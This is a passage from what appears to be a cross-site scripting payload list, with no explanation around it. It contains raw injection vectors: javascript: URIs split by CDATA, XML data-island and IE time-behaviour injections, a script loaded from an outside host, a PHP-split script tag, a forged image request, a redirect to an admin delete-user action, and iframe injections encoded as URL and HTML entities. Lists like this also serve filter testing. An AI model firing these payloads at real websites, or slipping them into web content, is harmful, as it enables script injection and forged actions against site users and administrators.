SRC=“javas]]><![CDATA[cript:alert(‘CrossSiteScripting’);”>]]> <br></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <br> <br> <br><XML ID=“CrossSiteScripting”><I><B><IMG SRC=“javascript:alert(‘CrossSiteScripting’)”></B></I></XML> <br><SPAN DATASRC=”#CrossSiteScripting" DATAFLD=“B” DATAFORMATAS=“HTML”></SPAN> <br> <br> <br><XML SRC=“CrossSiteScriptingtest.xml” ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <br> <br><HTML><BODY> <br><?xml:namespace prefix=“t” ns=“urn:schemas-microsoft-com:time”> <br><?import namespace=“t” implementation=“#default#time2”> <br><t:set attributeName=“innerHTML” to=“CrossSiteScripting<SCRIPT DEFER>alert(“CrossSiteScripting”)</SCRIPT>”> <br></BODY></HTML> <br> <br><SCRIPT SRC=“http://vulnerability-lab.com/CrossSiteScripting.jpg”></SCRIPT> <br> <br> <br> <br><? echo(‘<SCR)’; <br>echo(‘IPT>alert(“CrossSiteScripting”)</SCRIPT>’); ?> <br> <br><IMG SRC=“http://www.vulnerability-lab.com/file.php?variables=malicious”> <br> <br>Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser <br> <br> <br> <br> <br>%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E <br> <br><iframe src=http://test.de> <br> <br>&#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62 <br> <br>

&#60&#105&#102&#114&#97&#109&#101&#32&#115&#114&#99&#61&#104&#116&#116&#112&#58&#47&#47&#116&#101&#115&#116&#46&#100&#101&#62 <br>

%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E <br>